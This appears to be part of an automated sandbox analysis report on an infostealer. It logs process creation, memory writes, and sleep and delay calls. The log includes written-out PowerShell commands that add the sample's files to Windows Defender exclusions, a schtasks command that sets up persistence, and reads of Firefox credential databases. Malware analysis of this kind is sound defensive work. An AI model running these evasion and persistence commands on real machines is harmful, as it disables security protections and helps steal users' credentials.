Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Memory allocated: 250000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Memory allocated: 2130000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Memory allocated: 1F60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Memory allocated: 5450000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Memory allocated: 6450000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Memory allocated: 6580000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Memory allocated: 7580000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Memory allocated: 160000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Memory allocated: 21A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Memory allocated: 4F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Memory allocated: 5520000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Memory allocated: 6520000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Memory allocated: 6650000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Memory allocated: 7650000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3027 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3330 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4588 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1568 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1775
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2035
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1157
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2019
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3032 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe TID: 3232 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe TID: 552 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3336 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3348 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3364 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3368 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3276 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe TID: 3380 Thread sleep time: -1020000s >= -30000s Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 3464 Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe TID: 3764 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe TID: 3484 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3784 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3804 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3644 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3792 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3808 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3792 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3728 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3924 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Thread delayed: delay time: 60000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 21_2_0040317B mov eax, dword ptr fs:[00000030h] 21_2_0040317B
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 21_2_00402B7C GetProcessHeap,HeapAlloc, 21_2_00402B7C
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe"
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Memory written: C:\Users\user\AppData\Roaming\sharon38892.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Memory written: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe base: 400000 value starts with: 4D5A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\sharon38892.exe "C:\Users\user\AppData\Roaming\sharon38892.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process created: C:\Users\user\AppData\Roaming\sharon38892.exe "C:\Users\user\AppData\Roaming\sharon38892.exe" Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp7D2B.tmp"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Process created: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Queries volume information: C:\Users\user\AppData\Roaming\sharon38892.exe VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Queries volume information: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE
